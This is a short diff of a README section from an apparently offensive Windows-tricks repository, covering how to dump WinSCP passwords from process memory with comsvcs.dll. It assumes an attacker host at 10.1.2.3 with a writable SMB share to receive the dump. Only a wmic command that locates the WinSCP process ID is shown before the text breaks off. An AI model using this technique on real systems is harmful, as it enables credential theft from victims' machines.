billchaison/Windows-Trix/README.md

 ## >> Dumping WinSCP passwords from memory using comsvcs.dll

 Assumes attacking host 10.1.2.3 has an anonymous writable SMB share to receive the dmp file.<br />
-Assumes a command prompt with administrator privileges is in use.<br />
+Assumes a command prompt with administrator privileges has been acquired on the target.<br />
 ```
 wmic process where name^="winscp.exe" get Processid | findstr /r /c:"[0-9]" > %TEMP%\winscp.pid